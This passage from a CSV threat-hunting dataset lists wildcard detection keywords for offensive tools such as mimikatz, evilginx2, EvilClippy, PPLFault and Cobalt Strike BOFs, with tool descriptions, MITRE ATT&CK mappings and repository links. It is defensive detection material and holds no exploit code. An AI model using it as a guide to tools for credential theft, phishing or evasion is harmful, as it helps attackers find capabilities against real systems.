*,offensive_tool_keyword,ETWEventSubscription,Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.,T1053.005 - T1546.003 - T1055.001,TA0004 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*ETWEventSubscription.exe* -UserLogon*,offensive_tool_keyword,ETWEventSubscription,Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.,T1053.005 - T1546.003 - T1055.001,TA0004 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*etw-fuck.exe *,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*EtwHash.exe*,offensive_tool_keyword,ETWHash,C# POC to extract NetNTLMv1/v2 hashes from ETW provider,T1556.001,TA0009 ,N/A,N/A,Credential Access,https://github.com/nettitude/ETWHash,1,1,N/A,N/A,3,229,27,2023-05-10T06:45:06Z,2023-04-26T15:53:01Z -*EtwHash.git*,offensive_tool_keyword,ETWHash,C# POC to extract NetNTLMv1/v2 hashes from ETW provider,T1556.001,TA0009 ,N/A,N/A,Credential Access,https://github.com/nettitude/ETWHash,1,1,N/A,N/A,3,229,27,2023-05-10T06:45:06Z,2023-04-26T15:53:01Z -*ETWHash.sln*,offensive_tool_keyword,ETWHash,C# POC to extract NetNTLMv1/v2 hashes from ETW provider,T1556.001,TA0009 ,N/A,N/A,Credential Access,https://github.com/nettitude/ETWHash,1,1,N/A,N/A,3,229,27,2023-05-10T06:45:06Z,2023-04-26T15:53:01Z -*etwti-hook.*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*evasion/has_recycle_bin.*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*evasion_shellcode.js*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*event::clear*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*event::drop*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*EventAggregation.dll.bak*,offensive_tool_keyword,cobaltstrike,Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.,T1055 - T1078.003,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/trustedsec/PPLFaultDumpBOF,1,1,N/A,N/A,2,115,11,2023-05-17T12:57:20Z,2023-05-16T13:02:22Z -*EventAggregation.dll.bak*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*EventAggregation.dll.patched*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*EventAggregationPH.dll*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*eventlog -risk-i-know*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*eventlog_fucker.py*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*eventspy.cna*,offensive_tool_keyword,cobaltstrike,Bloodhound Attack Path Automation in CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/vysecurity/ANGRYPUPPY,1,1,N/A,10,10,300,93,2020-04-26T17:35:31Z,2017-07-11T14:18:07Z -*EventSub-Aggressor.*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*EventViewerRCE.ps1*,offensive_tool_keyword,EventViewer-UACBypass,RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass,T1078.004 - T1216 - T1068,TA0004 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CsEnox/EventViewer-UACBypass,1,1,N/A,10,2,108,21,2022-04-29T09:42:37Z,2022-04-27T12:56:59Z -*EventViewerUAC.*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,1,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z -*EventViewerUAC.*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/EventViewerUAC_BOF,1,1,N/A,10,10,130,29,2022-05-06T17:43:05Z,2022-05-02T02:08:52Z -*EventViewerUAC.x64*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,1,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z -*EventViewerUAC.x86*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,1,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z -*EventViewerUAC_BOF*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/EventViewerUAC_BOF,1,1,N/A,10,10,130,29,2022-05-06T17:43:05Z,2022-05-02T02:08:52Z -*eventvwr_elevator*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*-EventVwrBypass*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1118,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*evilclippy *,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*EvilClippy.exe*,offensive_tool_keyword,EvilClippy,A cross-platform assistant for creating malicious MS Office documents,T1566.001 - T1059.001 - T1204.002,TA0004 - TA0002,N/A,N/A,Phishing,https://github.com/outflanknl/EvilClippy,1,1,N/A,10,10,1956,381,2022-05-19T23:00:22Z,2019-03-26T12:14:03Z -*EvilClippy.exe*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*EvilClippyManager.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*EvilClippy-master*,offensive_tool_keyword,EvilClippy,A cross-platform assistant for creating malicious MS Office documents,T1566.001 - T1059.001 - T1204.002,TA0004 - TA0002,N/A,N/A,Phishing,https://github.com/outflanknl/EvilClippy,1,1,N/A,10,10,1956,381,2022-05-19T23:00:22Z,2019-03-26T12:14:03Z -*EvilClippyMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*evilfeed.go*,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - Collection,https://github.com/fin3ss3g0d/evilgophish,1,1,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -*evilginx*,offensive_tool_keyword,evilginx,evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies. which in turn allows to bypass 2-factor authentication protection.This tool is a successor to Evilginx. released in 2017. which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application. which implements its own HTTP and DNS server. making it extremely easy to set up and use,T1556 - T1565 - T1056 - T1558 - T1110,TA0002 - TA0003 - TA0004 - TA0009,N/A,N/A,Sniffing & Spoofing,https://github.com/kgretzky/evilginx2,1,1,N/A,N/A,10,8326,1638,2023-09-28T22:51:46Z,2018-07-10T09:59:52Z -*evilginx.exe*,offensive_tool_keyword,evilginx2,Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication,T1557.002 - T1114 - T1539,TA0002 - TA0003 - TA0008,N/A,N/A,Sniffing & Spoofing,https://github.com/kgretzky/evilginx2,1,1,N/A,N/A,10,8326,1638,2023-09-28T22:51:46Z,2018-07-10T09:59:52Z -*evilginx2*,offensive_tool_keyword,evilginx2,Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication,T1557.002 - T1114 - T1539,TA0002 - TA0003 - TA0008,N/A,N/A,Sniffing & Spoofing,https://github.com/kgretzky/evilginx2,1,1,N/A,N/A,10,8326,1638,2023-09-28T22:51:46Z,2018-07-10T09:59:52Z -*evilginx-linux*,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - Collection,https://github.com/fin3ss3g0d/evilgophish,1,1,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -*evilginx-mastery*,offensive_tool_keyword,evilginx2,Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication,T1557.002 - T1114 - T1539,TA0002 - TA0003 - TA0008,N/A,N/A,Sniffing & Spoofing,https://github.com/kgretzky/evilginx2,1,1,N/A,N/A,10,8326,1638,2023-09-28T22:51:46Z,2018-07-10T09:59:52Z -*evilgophish*,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - Collection,https://github.com/fin3ss3g0d/evilgophish,1,1,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -*evilgrade*,offensive_tool_keyword,evilgrade,Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents). a working default configuration for fast pentests. and has its own WebServer and DNSServer modules. Easy to set up new settings. and has an autoconfiguration when new binary agents are set,T1565 - T1566 - T1573 - T1203 - T1210 - T1211 - T1212,TA0002 - ,N/A,N/A,Frameworks,https://github.com/infobyte/evilgrade,1,0,N/A,N/A,10,1236,288,2021-09-01T17:08:27Z,2013-04-22T16:08:48Z -*EvilLsassTwin.exe*,offensive_tool_keyword,EvilLsassTwin,attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.,T1003.001 - T1055 - T1093,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access - Defense Evasion,https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin,1,1,N/A,9,1,39,3,2023-09-11T14:03:21Z,2022-09-13T12:42:13Z -*EvilLsassTwin.nim*,offensive_tool_keyword,EvilLsassTwin,attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.,T1003.001 - T1055 - T1093,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access - Defense Evasion,https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin,1,1,N/A,9,1,39,3,2023-09-11T14:03:21Z,2022-09-13T12:42:13Z -*evilmog/ntlmv1-multi*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*EvilnoVNC-main*,offensive_tool_keyword,EvilnoVNC,EvilnoVNC is a Ready to go Phishing Platform,T1566 - T1566.001 - T1071 - T1071.001,TA0043 - TA0001,N/A,N/A,Phishing,https://github.com/JoelGMSec/EvilnoVNC,1,1,N/A,9,7,662,118,2023-09-25T10:50:52Z,2022-09-04T10:48:49Z -*eviloffice.exe*,offensive_tool_keyword,EvilClippy,A cross-platform assistant for creating malicious MS Office documents,T1566.001 - T1059.001 - T1204.002,TA0004 - TA0002,N/A,N/A,Phishing,https://github.com/outflanknl/EvilClippy,1,1,N/A,10,10,1956,381,2022-05-19T23:00:22Z,2019-03-26T12:14:03Z -*EvilPayload.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*evilqr-main*,offensive_tool_keyword,evilqr,Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice,T1566.002 - T1204.001 - T1192,TA0001 - 